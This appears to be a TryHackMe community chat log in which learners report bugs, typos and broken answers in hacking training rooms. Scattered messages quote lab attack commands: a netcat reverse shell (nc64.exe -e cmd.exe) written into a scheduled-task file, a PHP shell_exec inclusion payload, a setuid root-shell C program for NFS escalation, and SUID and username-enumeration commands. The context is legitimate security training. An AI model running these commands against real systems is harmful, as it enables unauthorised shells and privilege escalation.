i think rootme is bugged

#

when i run find / type -f -user root -perm -u=s 2> /dev/null in the shell i get nothing

rugged canyon
#

what about find / -type f -user root -perm /4000 2>/dev/null

barren bough
#

that worked thank you so much

solemn silo
solemn sinew
placid abyss
#

fileinc room, task 6 - to include remote files and into a vulnerable application, and what exactly??

barren bough
#

hey this comand doesnt work

quaint sparrow
#

Are you on the attackbox or VM?

quaint sparrow
barren bough
#

huh

#

ok

#

ill delete that then

keen gate
#

In the splunk101 room, task 7 asks, "What is the highest EventID?" This is confusing because it is not asking for the highest number, but rather the event with the most occurrences.

twin tapir
ebon otter
#

the defang link in task 6 of the "phishing emails 1" room is no longer valid. so i decided to try just go with what i and most people use which also was wrong.

so i was forced to go and verify the correct answer from somewhere else where i found out cyberchef also have a defang option which escape :// by default, which i almost never see. so i also suggest adding extra information such as "cyberchef also have a defang option" so people know they can use that when the defang resource no longer works.

Also, regarding the "-CLICK HERE" URL question, if i didn't already know i had to remove =?UTF-8?B? from the beginning and ?= from the end of the subject line string, i wouldn't had know how to deal with this as it don't mention that at all, i feel such information is important for people to know.

solemn sinew
proper meadow
nimble pawn
#

What is the primary registry path associated with this attack?

#

Is this a bug that I can't submit the right answer?

covert ruin
quaint sparrow
#

You need to start the machine.

covert ruin
#

Yes I have machine working and from firefox inside I cannot reach this URL

quaint sparrow
#

Have you pressed that green button?

covert ruin
#

thanks Scrubz

#

sorry for silly question it is working ;p

quaint sparrow
#

πŸ™‚

In 2 min(s) the URL will update and change.

covert ruin
#

yep πŸ™‚ I thought launching VM is enough but also this I will remember now thanks

steel thunder
#

in room Obfuscation Principles (https://tryhackme.com/room/obfuscationprinciples), Task 4:
The task asks you to obfuscate a powershell snippet, and upload it to a website, which if obfuscated enough provides you with the flag. However, without obfuscating the snippet, it is still accepted and the flag is given anyway. Don't think that that's supposed to happen.

flat socket
dusky junco
livid escarpBOT
#

Gave +1 Rep to @flat socket

wheat fractal
chrome junco
quaint sparrow
dusky spindle
quaint sparrow
north folio
rugged canyon
rugged canyon
north folio
#

alright. i already have the answer thanks

sour coral
#

In 'Investigating Windows' I think the question ''
At what time did Windows first assign special privileges to a new logon? Answer format: MM/DD/YYYY HH:MM:SS AM/PM', the format should be modified, the hour is not 'HH' but just 'H'

ebon otter
#

seems there is a typo in the "diamond Model" task 6 as the sentence should be

Malicious activities occur in two or more events rather than just one

and not

Malicious activitiesdon'toccur in two or more events rather than just one

nocturne lily
#

Hello Guy's, on the room Windows Forensics 1 there is an issue with the question "Which ControlSet contains the last known good configuration?" the answer is supposed to be "2" but it was set to "1"
https://tryhackme.com/room/windowsforensics1
"The hives containing the machine’s configuration data used for controlling system startup are called Control Sets. Commonly, we will see two Control Sets, ControlSet001 and ControlSet002, in the SYSTEM hive on a machine. In most cases, ControlSet001 will point to the Control Set that the machine booted with, and ControlSet002 will be the last known good configuration. " As said before the answer should be "2.

eternal summit
#

-banspam @silver fern

livid escarpBOT
#

πŸ”¨ Banned Darisales#9725 indefinitely

cold geyser
#

Room: https://tryhackme.com/room/btredlinejoxr3d#
Task 4 question 2 wants to know the BIOS Version for the workstation.
The standard collector says "AMAZON - 1" which is wrong. Since I could solve all other questions for task 4 I suppose that the machine has been moved but the answer has not been updated.
Edit:
There is a previous error report from 9/9/2022 confirming this.
#791764435991658556 message

hasty stone
#

In the Intro to Networking room on Task 6 you have to use traceroute. A note should be added that on Debian systems you might need to install traceroute. I am on Ubuntu 22.04.

eternal summit
hasty stone
livid escarpBOT
#

Gave +1 Rep to @eternal summit

sour coral
#

In the Cholocate Factory, at the very end, to get root flag, I encountered an issue when trying to run the script on the remote host

Enter the key: ###########################################=
Traceback (most recent call last):
File "root.py", line 3, in <module>
key=input("Enter the key: ")
File "<string>", line 1
###########################################=
^
SyntaxError: unexpected EOF while parsing

(I redacted the key).

I had to download the code, and modify it to add a 'b' in front on the encrypted string.

jolly oracle
#

🀣

#

ok

supple forge
#

Task 11: Privilege Escalation: NFS

#

Even after mounting a compiled nfs file with chmod to +s, I am not able to run the nfs file.

#

It throws an error saying {./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
}

#

I have tried multiple of times but the same error again and again

eternal summit
obsidian kiln
#

Or, more accurately, not cross-compiling kekw

azure ravine
#

A couple of answers in Task 2 of WebOSINT appear to be out of date.

keen bloom
#

@ cyber defence path/sysinternals/task 9:the answer to "Run the Strings tool on ZoomIt.exe. What is the full path to the .pdb file?" is still the old answer from previous update to the room,because i gives a different path compared to people who have completed the room before and made a walkthough about it

jaunty matrix
#

Room: https://tryhackme.com/room/bof1
Task 4 Procedures Continued
Question "What register stores the return address?" should be "What register stores the return value?"

quaint sparrow
#

@raw bison

misty cave
#

@earnest patio @glad badger Morning, Might wanna look at the licencing for THMJMP2 in https://tryhackme.com/room/lateralmovementandpivoting when you RDP in you get a warning message, and then checking the System bit, shows it's not activated. The network had been up for 4hours+ at this point, so it should have activated I think?
Oh, it was 10.200.75.101.
Anyway, figured it was worth bringing up, especially with that 109 day timer.

misty cave
#

There's also Furthermore, outbound connections from THMDC are only allowed machines in its local network, making it impossible to receive a reverse shell directly to our attacker's machine. in Task 7. I think it's missing a to in the middle and should be [..] THMDC are only allowed to machines in its local network [..]

candid garden
shell steeple
glacial pond
#

The Windows Machines in the "signatureevasion" room exhibit a rather annoying behaviour: Once a file is uploaded and the check fails, the file is not properly deleted and thus subsequent uploads fail with "File already exists". Only remidiation seems to be to stop and restart the machine.

proud pagoda
#

Room: https://tryhackme.com/room/pyramidofpainax
Task 5, last two questions basically asks the same thing, but the answers are different (the second-last wants the binary name)

wide junco
keen bloom
lime maple
#

I have a machine that will not let me terminate it can anyone help

sour coral
sour coral
#

In room 'WebOSINT', in Task 2, for the question 'What country is listed for the registrant?', the answer returned by whois is Iceland, but the answer is Panama. I tried different whois website, and I never got Panama. I think it has changed since the challenge has been created.

sour coral
#

This room should be updated, many informations have changed since the creation of the room

eternal summit
#

@flat jolt No

flat jolt
#

so now worry

#

and thanks for not banning me

#

but how tf i got hacked ,even i had my 2fa on, sms verification on, even tho i haven't clicked on any scam links yet too

glad tundra
#

sim swap πŸ˜†

#

not funny and doubtful but still....

#

especially if no other accounts were affected.

raw bison
#

-banspam 238716171971592194

livid escarpBOT
#

πŸ”¨ Banned Syvas#2402 indefinitely

forest axle
#

Hey, I have found a bug in the room Zero Logon, Task 2 - Impacket Installation. Second line of code (after upgrading pip) we have to use *venv * command instead of virtualenv. Only after this installation progress further.

eternal summit
forest axle
eternal summit
#

The web based kali is not customized. None of them are adapted per-room either.

forest axle
#

Oh I see, thank you!

prisma bronze
wheat fractal
prisma bronze
#

so it's a feature then, gotchu

prisma bronze
sullen basin
flat socket
#

Minor nitpick, there is a spelling mistake in the Docker Rodeo,, task 6. At "the same job as it's networking sibling" should be "the same job as its networking sibling"

quaint sparrow
#

it's = It is.

flat socket
#

Yeah, but "accomplishes the same job as it is networking sibling" doesn't make sense

quaint sparrow
#

Nope, I seen the error.

#

NVm me, πŸ˜‚

dusky junco
#

the apostrophe is used possessively

flat socket
#

Yeah, so there shouldn't be one, right?

#

English is my second langauge, so I'm not too good at it

dusky junco
#

the cat's mother

#

although yeah actually

#

you're right

flat socket
#

Alright haha, I'm rather confused at the moment

#

English is hard :<

dusky junco
#

its is not a possessive pronoun

flat socket
#

Glad to be of use though :)

dusky junco
#

I'll update shortly ty(:

flat socket
#

Gread :)

gaunt arrow
#

Good morning all - I see that was brought up on the past, but I cannot RDP into the new Active Directory Basics room. It doesn't matter which username:password combination I use, it tells me that the credentials are incorrect. Thanks

brave ferry
#

Are you using the right domain?

gaunt arrow
#

I thought so, but those easy mistakes happen I guess. I will try again soon.

slim ledge
#

Hi everyone. Got an error saying this Room is private: https://tryhackme.com/room/persistence
It was referenced in the Cyber Kill Chain Task 6: https://tryhackme.com/room/cyberkillchainzmt

Not sure if this is an error, but just reporting it anyways.

balmy mantle
#

Hi everyone, there are two questions in the Linuxfundamentalspart1 that i answered wrong because i missclicked still it accepted the answer, first its about > replacing i accidentally appended the word with >> the other one was, i should cat a text data, in it was "Hello World!" i answered "Hello World1" , i mean the Hello world one isnt so bad, but appending in a replace command feels like i made a mistake but still get the thumbs up , its Linuxfundamentalspart1, Task 5, Task 7.

dusky junco
bitter jetty
#

Hello everyone, i can't validate 2 questions in the room "Metasploit : Meterpreter" > Task 5 : Post-Exploitation Challenge in the Jr Penetration Tester which the room ask to write the path of the secrets.txt and realsecret.txt files

prisma bronze
#

paragraph 2 of the task #3 in the https://tryhackme.com/room/osimodelzi room has some "I accidentally a word" issues, please fix

The receiving computer will also understand data sent to a computer in one format destined for in another format.
Like I understand what this is meant to convey. But it's a trainwreck to put it gently.
For example, when you send an email, the other user may have another email client to you, but the contents of the email will still need to display the same.
would sound better if "(...) the other user may have an email client that's different to yours.(...)"

muted orchid
#

Hi, I think the pcap file is missing from Carnage room or maybe I miss something?

primal flint
#

hello guys, is there anyone having a problem in "vulnversity" room while browsing the given ip?

hazy tiger
quaint sparrow
#

Probably not, I asked them in a different channel, they never got back to me though.

fierce folio
#

Having issues with Flag 13 in Windows Local Persistence in the Red Team Pathway. You are tasked to create a new key in HKCU\Environment that will run with the user relogs. I have reset the machine several times and recreated the variable but can never get the shell connection. Apparently other people have had this issue in the past. Not sure if I'm doing something or it's a bug so i'm putting it here

limpid ridge
#

rootme bug for me, the connexion stop and restart a bit etc ... (modifiΓ©)
[21:44]
i uploaded a reverse shell but the connetion stop when it bug
[21:47]
'find: '/proc/14/ns': Permission denied
find: '/proc/15/task/15/fd': Permission denied
find: '/proc/15/task/15/fdinfo': Permission denied
find: '/proc/15/task/15/ns': Permission denied
find: '/proc/15/fd': Permission denied
find:

Terminate channel 3? [y/N]
Terminate channel 3? [y/N]
Terminate channel 3? [y/N]
Terminate channel 3? [y/N]
Terminate channel 3? [y/N]'

#

it's unplayable

eternal summit
limpid ridge
#

maybe it come from the vpn

eternal summit
blazing helm
#

Im counting finding this as OSINT πŸ˜‚ that question sucked.

hushed hamlet
#

am i the only one who experiances "Exploiting Active Directory" room to be very slow ?

sharp grotto
scenic heart
#

@sharp grotto . The THM forum linked on the room has the answers and some other issues/solutions. Up by the start attackbox button, there is a help button. Click Help then Forum Post and you’ll be at the THM forum for the room

sharp grotto
#

Thanks @scenic heart ! I will check there.

livid escarpBOT
#

Gave +1 Rep to @scenic heart

flat socket
#

I had to look up a writeup for the answer to this one

sharp escarp
#

the ||netcat rev shell in Mat's crontab || in Watcher isnt giving me a rev shell ...been 15 mins on a ||1 min job||

#

gtg mention me and i'll check in the morning

elfin field
#

Is there something wrong with the Easy Peasy machine ??
I'm doing the port scan and 10 minutes later still no output.

#

Just hangs like this;

└──╼ $sudo nmap -p- -T4 10.10.158.4 | tee Port_Scan.txt
Starting Nmap 7.92 ( https://nmap.org )
civic tusk
#

Problem with Threat Intelligence Tools room from SOC

#

Task 3, Question 1

elfin field
#

What on earth is this???

#

@civic tusk

civic tusk
#

Ah well nevermind, I am suppost to answer from screenshots and not analyze by my own

#

my bad

elfin field
#

Something wrong with the Easy Peasy room ??;

└──╼ $sudo nmap -A -T4 10.10.158.4 | tee Aggressive.txt
[sudo] password for su8z3r0: 
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 10.10.158.4
Host is up (0.27s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/16%OT=80%CT=1%CU=39111%PV=Y%DS=4%DC=T%G=Y%TM=637396
OS:91%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST
OS:11NW6%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
OS:N(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 4 hops

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   74.39 ms  10.4.0.1
2   ... 3
4   323.20 ms 10.10.158.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.57 seconds
#

Shows one port open though one is not the correct answer.

#

@quaint sparrow would you help me with this one plz ?

civic tusk
#

What

elfin field
#

?

civic tusk
#

You have 1 port open, port 80 is open

elfin field
#

Yeah....

#

It's not accepting 1 as the correct answer though.

quaint sparrow
#

You haven't scanned all ports.

#

Unless -A adds them all.

elfin field
#

I tried this, though it just hangs;

└──╼ $sudo nmap -p- -T4 10.10.158.4 | tee Port_Scan.txt
Starting Nmap 7.92 ( https://nmap.org )
#

Been like that for nearly 15 minutes with no output.

elfin field
#

What am I missing @civic tusk ?

civic tusk
#

-p- scans all 65535 ports so yea.. it takes a while, but you can press enter it will show you how far the scan is (for example 80%) or you can press v for Verbose

quaint sparrow
#

-A found one port.
-p- found more than one port.

elfin field
livid escarpBOT
#

Gave +1 Rep to @civic tusk

quaint sparrow
elfin field
#
SYN Stealth Scan Timing: About 61.52% done; ETC: 00:53 (0:07:50 remaining)
civic tusk
#

I would reccomend sudo nmap -p- -vv -sT 10.10.158.4

elfin field
civic tusk
quaint sparrow
#

Also, @elfin field your problem wasn't a bug

elfin field
halcyon mango
#

Just finished the Annie room. Though the privesc is really fun and everything, getting initial access is a pain and really buggy...

sharp escarp
#

guys any fix for the ||cronjob|| in watcher?

rugged canyon
copper tide
#

Hello!

#

I have a bug in room (Crack The Hash Level 2)

#

By the Help, they exist, but it seems that the -l parameter is not working or at least it is not clear what it does.

gaunt arrow
#

Good morning all. I went back to the Active Directory Basics room again today, and I still get a "The user name or password is incorrect. Try again" on a Windows page (the blue Windows window opens with that notification, not as a xfreerdp error message). I am using xfreerdp /v:$IP /u:THM\Administrator /p:Password321 Any ideas on my problem?

gaunt arrow
#

Ha - i'm sure that's it, so stupid. Thanks

subtle lodge
#

Reposting for context
Hey, I'm trying to load the burpsuitebasics room and its relevant website, but it's loading without CSS. Tried in incognito but no luck. Works when using direct ip rather than 0.0.0.0.p.thmlabs.com version

#

No luck with http/https

raw bison
# subtle lodge

Refresh the page 2 - 3 times, just with F5, that seems to have fixed it for me

subtle lodge
#

Not sure what's going on then, just retried in incognito and it's still not cooperating. Let me try another browser

#

Yeah, working on another browser

#

Must've been cached - thank you 😁

blazing basin
#

hololive - the start, extend and reset buttons are not working and the network is in the resetting state for the past maybe 10 hours

obsidian kiln
dusky gust
#

Room not opening

wheat fractal
#

For the Security Principles room, Task 4: Biba Model: says, β€œStart integrity property” instead of star integrity property.

subtle lodge
chrome kraken
flat socket
dusky junco
flat socket
#

I got stuck on that task for hours

chrome kraken
livid escarpBOT
#

Gave +1 Rep to @flat socket

flat socket
#

Anytime :)

flat socket
#

Is anyone else having trouble with the Flatline room? the exploit just keeps timing out

obsidian kiln
#

@zinc cradle have fun

gaunt arrow
#

I still have the same problem on the Active Directory Basics room again today. I still get a "The user name or password is incorrect. Try again" on a Windows page (the blue Windows window opens with that notification, not as a xfreerdp error message). I am using "xfreerdp /v:$IP /u:THM\Administrator /p:Password321" Yesterday it was suggested that I shouldn't be using the backslash, but that did not fix my problem. I still cannot rdp to the machine. Additional information - under my xfreerdp command, I first get "Error: SSL_NOT_ALLOWED_BY_SERVER"

zinc cradle
#

I think it has something to do with the AWS instance deployed on THM, my testing environment it worked flawlessly and quickly but I have noticed that when I deployed it for testing on THM it refused to respond, moving it up to a more powerful t2 instance improved performance but it still wasn’t great.

TL;DR Windows is a big boy and THM doesn’t get enough revenue from this box to justify paying for a more powerful instance than t2

#

That’s why most community boxes are Linux, coz it’s much smaller, cheaper and easier to run than Windows

eternal summit
#

(i realise that might not be a you thing, cmn, but I think it was you talking about the new instancr type way back)

glad badger
quaint sparrow
#

Isn't Flatline already released?

glad badger
#

Let me check the completion analytics @zinc cradle

zinc cradle
#

it does sometimes just fail to respond and usually you just need to reboot the box but thats i guess expected with Windows on 1GB of RAM

glad badger
#

Users have less of a problem answering the first question, they do have a problem answering root.txt

#

I'll request a resource increase for it to t2.medium

glad badger
glad badger
pine linden
#

I'm having issues with the Zero Logon room. I can't seem to get the impacket installation to work in attack box.
When running the first command, python3 -m pip install virtualenv, several things seem to work and then I get an error saying, "'importlib-resources' requires a different python 3.6.9 not in '>=3.7'"
So then when I run the second command, it just says there is no module named virtualenv
Wondering if Python was updated since this room was built and now these commands don't work...or I'm just missing something which seems more likely.
I'm thinking the fix would be force the box to run an older version of python but don't know how to do that

#

Posted this in room help earlier but wondering if it is a bug since the room was built

obsidian kiln
# pine linden I'm having issues with the Zero Logon room. I can't seem to get the impacket in...

Sounds like the AttackBox has been updated and no longer has a suitable version of Python installed.
For, uh, various reasons the author of that room no longer has access to update it to match the latest version of Python, so unless QA fancy figuring out Impacket installations, you may need to debug it a little I'm afraid.

Decent chance you'll have better luck with a local Kali installation, for the record. Kali has older Python versions installed / available by default. Also gives you more flexibility with it.

dusky junco
# pine linden I'm having issues with the Zero Logon room. I can't seem to get the impacket in...

yupp so basically this is a problem that's pretty much a result of all the different python environments and pip versions on the attackbox. You should be able to use python3.9 on the attackboz though. I.e:

python3.9 -m pip install virtualenv
python3.9 -m virtualenv impacketEnv```

If that doesn't work, then yeah I'd probably suggest either using a local kali or the THM kali as that handles different python versions a bit better. cc @obsidian kiln
languid musk
#

I've an issue with the room Bounty Hacker.
If I use the VPN with my local Kali, I'm able to connect to the ftp but can't list the files or download them. Via the Attack Box all works fine, but Not from my local machine. I always get the message "switching to passive mode" and then timeouts

languid musk
#

Yes, a Virtual Box with Kali and the VPN is running in the VM

gaunt panther
#

Windows Internals, would this be considered a bug?

quaint sparrow
#

No, you're copying the wrong the character.

#

Not copying, entering.

gaunt panther
#

I know you answered in the other chat, but just for information's sake, it worked by removing a character, by accident, and any other combination I tried didn't.

#

A good waste of an hour...

quaint sparrow
#

I answered that part in another chat too.

gaunt panther
#

I don't get how that makes sense, it means it should have worked with my other variations... Im not sure what you mean by that then, sry

quaint sparrow
#

You got a character wrong, however removing that incorrect character allowed answer tolerance to kick in, if you refresh the room the right answer will be displayed. showing the character you got wrong.

gaunt panther
#

looking at that now, and I've for sure tried that, likely my second attempt of many... I've done many rooms, and never got a problem to this extend with one of the answer fields

#

anyways im moving on, I thought it was worth a mention

quaint sparrow
#

This one is probably the worst because you can't properly copy from the box.

gaunt panther
#

and the worst set of confusing characters... Its annoying, but there are worst things to deal with for sure... it was infuriating... I thought I was supposed to manipulate the file after so many attempts at getting it wrong...

limpid kraken
#

Is there any bug in adbasics_v1.2 ?
I am unable to change the password for sophie even though i have given the due rights to phillips

eternal summit
#

-banspam @frank pelican

livid escarpBOT
#

πŸ”¨ Banned uglyduck#0609 indefinitely

wheat fractal
#

Hi All, I believe there are some errors on this page https://tryhackme.com/room/packetsframes (task 1 for now) also, the sentences are written in a confusing manner. Is this the correct place to report?

#

For example, it says " Think of this as putting an envelope within an envelope and sending it away. The first envelope will be the packet that you mail, but once it is opened, the envelope within still exists and contains data (this is a frame)." -- I am not an expert, but the frame is the outer envelope, and packet is inner. It does a poor job of explaining what a frame is, and its purpose.

#

Someone responsible should rewrite it.

mental plinth
#

Hi all, anyone having network troubles with the Windows PrivEsc room? Got disconect from rdp every 30 seconds..

formal mirage
copper tide
#

Hello, pleople!

#
#

Exist a small differsense in exemple CVE.

#

Sounds simple, but it directs people to look for old CVEs. It would be nice to make this simple correction.

#

@dry blade

#

A second consideration would be to place a target to fetch the npiet tool. I think a hint button would be great.

#

Thanks!

torn lotus
#

i may have found a bug in the Windows Priv Esc room here

#

the command lacks the quotation marks i assume

#

echo 'c:\tools\nc64.exe -e cmd.exe 10.10.128.57 4444' > C:\tasks\schtask.bat

#

otherwise i get an error message

eternal dagger
grizzled burrow
manic falcon
#

this is intresting

#

i copied the answer(which is correct) to the url bar and it shows problem and somehow it is correct

raw bison
north folio
vestal copper
#

Hi, I'm currently experiencing some connection issues (connecting and disconnecting over and over again) with the machine in the "Windows Forensics 2" room, but my internet connection is stable. Any suggestions? Did not had that issue before.

north folio
north folio
#

its not open

raw bison
north folio
#

NetSecMod Room 02 telnet

raw bison
#

There is a new target machine to deploy there

north folio
#

πŸ™‚ makes sense. sry

raw bison
#

Not an issue

obsidian python
#

Hey! In the toolbox: vim room b is not accepted to the question "How do we jump to the start of a word?"
I got that w is the right answer, but that should be specified in the question because I spent a few minutes thinking on what other method are there to go to the beginning of the word... : )

plain drift
#

Working on the Mobile Analysis Room and noticed a small, potentially "wrong answer" issue.
Task 4, Q1 refers to virus total for the task's malware:
https://www.virustotal.com/gui/file/e201a1d2cecf1d04d97d59abec0863c716dcf9fcad89b85d036f9163a48057e7
Question asks about Avast-Mobile, but the accepted answer is for Avast (no mobile). Unless of course I'm misreading virus total, in which case I'll slink back under my rock... lol

The page shows:
Avast
Android:Metasploit-G [PUP]

Avast-Mobile
Android:Evo-gen [Trj]

The first is accepted.

Also, the questions is a bit awkward too; if you are fixing stuff, you may want to ditch the 'can' in:
"What does Avast-Mobile can tell us about this software?"

maiden maple
#

Question Text is Wrong

Room: Pyramid of Pain
Task 5
Third question is same of fourth.

Third question must ask for dropped binary name instead of malicious document name

agile flower
#

Answer seems to be out of date

Room : Hackpark
Task 4
What is the OS version ?

When I use the sysinfo command, the OS version seems to not be the same (and the one displayed by the machine is wrong)

Maybe it's my bad, but I have no idea where I missed if its my bad

(Just delete this or DM me if it's normal πŸ™‚ )

Have a good day

fast yew
#

Unable to validate answer

Room: brim
Task 7
What is the amount of transfered bytes to "101.201.172.235:8888"?

When I enter the value it's always wrong but I 'm sure it's the right answer provided in the requested format

glad badger
raw bison
#

Very likely not a room bug, ask in #room-help . You have to start the python server on the target machine

broken tiger
#

owaspTop10 - Task 25
The IP Address in the text is fixed

tidal wraith
#

https://tryhackme.com/room/hydra#
Room: hydra#
Task: 2
Desc: SSH - the example command may be displayed incorrectly.

Not sure if this is by design or not.
When running the SSH command as displayed in the example it gives "[ERROR] could not connect to ssh:<MACHINE_IP:22> -Timeout connecting to <MACHINE_IP>

Solution
When removing the option "-t 4" it work just fine.

wheat fractal
wheat fractal
#

wow

#

i see the damn error

#

SecLists directory is supposed to be secLists

sharp citrus
#

wordlist if i may guess

#

yep

wheat fractal
#

linux and their damn cap sensitive annoying software

sharp citrus
#

i blurred results ofc

wheat fractal
#

@sharp citrus new error now

sharp citrus
#

check you command bit more

#

let me know when you see it πŸ™‚

#

@wheat fractal

wheat fractal
#

man im about to πŸ˜ƒ πŸ”«

#

im an idiott

sharp citrus
#

is ok. we are here to learn

wheat fractal
#

@sharp citrus i have got it finaly working, but no names are displayed

sharp citrus
#

can you paste that code here

wheat fractal
#

wont let me paste it cuz idk why, prob cuz its a virt machine

sharp citrus
#

ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.141.146/customers/signup -mr "username already exists"
use this exactly

#

@wheat fractal

wheat fractal
#

whats the difference?

sharp citrus
#

ill explain. ill let you know if this work

wheat fractal
#

wrong directories, I changed that, i got admin, steve, robert, yay it worked, so what did you change?

sharp citrus
#

will be sound weird. but all the " was problem.

#

i delete them and input again

#

since my terminal color code me some type mistakes

wheat fractal
#

you hack from the website virtual machine or your own?

#

to get the special terminal filter?

sharp citrus
#

first top code is your code. bottom one is mine

#

i use mine laptop. not the them one

wheat fractal
#

aha, i get the problem

#

thanks for the troubleshoot

sharp citrus
#

np

amber otter
#

Heyo! I think an image is missing from this particular room:
https://tryhackme.com/room/linuxfundamentalspart2

  • It references looking at "cmnatic.pem" file in the inital screenshot at the top of the task, (task 5) however the image in reference is not showing (though it does show in the video at the top of page).
  • And based on the video, it's missing the image break down of the -rwxrwxrwx for showing what each grouping of permissions references (aka directory/file owner/etc)
  • I believe that the first mention of su is in the wrong section of that specific task. Kind made my mind go "wat" as it was talking about rwx and all of a sudden bam su!
subtle lodge
#

Hey, I've been trying to complete Task 11 of linprivesc, but when it comes to executing the executable on the target machine, I get an error of

#

My executable's code is just

#define _GNU_SOURCE
#include <unistd.h>
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
#

So I'm not really sure what I've done wrong.

#

It mounted correctly, because I can see the files on the target machine.

subtle lodge
#

Oh? Ok then πŸ˜„

rapid zealot
#

Inside of breaching active directory, task 5 is bugged. No SMB traffic comes through while waiting for responder to pick up connections. Waited hours (3+). Nothing. LDAP works just fine, so I know my settings are correct.

smoky sail
#

Hi, just starting out on the tutorial and getting an Error Code: 405 when trying to get to the localhost in firefox. Tried both the standard attack box and the Kali Linux attack box I am guessing something should be there other than an error code.

eternal summit
smoky sail
#

cheers

eternal summit
#

All sorted?

smoky sail
#

all good thatnks

shell ridge
#

cri Any fixes, sometimes the THM networks just don't really start but yet it shows running.

#

I'm doing lateral mov & pivoting right now

#

and its been quite frustrating having to wait to either it to go down so i can restart it or to have enough votes for a reset

wheat fractal
#

on the room Blaster the walk through says to go to the internet history. though the history is blank I watched darksec video and yeah box lacks that history.

quaint sparrow
brave ferry
#

On the box Lockdown, when you access the db it doesn't show a password sometimes?

#

Its happened twice for me but on a reset the password appeared??

sinful meteor
#

There is a small issue with Pre-Security Pathway "How websites work" Task 4: Sensitive Data Exposure

It tells you to either click on the hyperlink to view the code (after imputing incorrect credentials) or use CTRL+U to view the source code. The issue is that the hotkey for CTRL + U does not provide the answer. I asked for assistance and Issai mentioned that you would need to rightclick -> view frame source and not the full page source (which is what CTRL+U gets you)

sinful meteor
#

Found another bug, supposedly. I am unable to download HTTPServer using Python3 on the SSH machine. I posted asking if I was doing something wrong and another member mentioned that he had the same issue and it never worked for him either.

eternal summit
#

You're not makkng a request to that server

#

Open a new attackbox terminal

rotund burrow
#

@hazy tiger

hazy tiger
#

-banspam @undone umbra

livid escarpBOT
#

πŸ”¨ Banned β™€Ε‚γ€ŽWang3301ζΌ‚ζ΅ηŽ‹γ€Ε‚β™€#8078 indefinitely

sinful meteor
placid abyss
sinful meteor
quaint sparrow
#

It definitely isn't bugged.

fervent cobalt
#

Hello, I found some small issues (probably copy paste) with https://tryhackme.com/room/unifiedkillchain.
In "Phase: In (Initial Foothold)"

frail radish
fresh niche
#

BUG: Solving a challenge through a previous challenge

Under the "Challenges" task in https://tryhackme.com/room/fileinc (File Inclusion), we can get the /etc/flag3 in Lab#3 by an RFI in Lab#1 :
||<?php shell_exec("cat /etc/flag3 > remote.php"); ?>||

glacial pond
#

Minor inconvenience in the Exploiting Active Directory Room / Task 8: The final mimikatz references RC4 hashes to supply while the earlier "lsadump dcsync" invocation does "only" provide aes128, aes256 and des hashes.

grim cape
#

Hi, i found a small bug in Operating System Security room.
Task 1 accepts answer as correct, even if the last word is not there.

quaint cobalt
#

Acronym is defined as Security and Event Information Management (SIEM) but the order of the words spells an acronym "SEIM", may be confusing for some beginners

#

Google search, according to @stiff barn reveals the following:

#

Day 2 room

obsidian kiln
#

Google search has it the right way around

frank wyvern
#

Is this a bug or do the questions usually have a certain tolerance level for typos? (room: cyberkillchainzmt)

obsidian kiln
#

How the acronym made sense in whoever wrote that one's head is beyond me

dusky junco
obsidian kiln
dusky junco
obsidian kiln
dusky junco
#

I invoke the 5th

obsidian kiln
#

Nah, just invoke the programmer's get-out-of-jail-free card

#

"Not enough Coffee"

dusky junco
#

I dont' drink coffee but I will use the content writer's get-out-of-jail card of writing with no sleep

#

πŸ˜„

obsidian kiln
#

Another good choice πŸ˜†

dusky junco
#

I'm sure you know the feeling πŸ˜‰

obsidian kiln
#

Unfortunately πŸ˜„

quaint cobalt
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

quaint cobalt
#

but dang you guys fixed it so fast. Awesome work.

#

is this supposed to be private?

dusky junco
#

TLDR: yes

twin tapir
#

yes

muted panther
#

AoC4 Day 2
I think there's a few missing line breaks in the command responses

glad badger
livid escarpBOT
#

Gave +1 Rep to @muted panther

zinc breach
#

Day 2 isn’t working as it should be.

civic carbon
toxic shard
#

I'm not exactly sure, if this is considered a bug, but in the room "owasptop10" in Task 15 in the first codeblock, there are some invisible special characters %C2%A0 in front of the two lines <userInfo> and </userInfo> which can make the next task quite difficult. One usually copies the code from the Task before and thinks that it should work, but it doesn't.
See the difference in the following two lines (the second one does work):

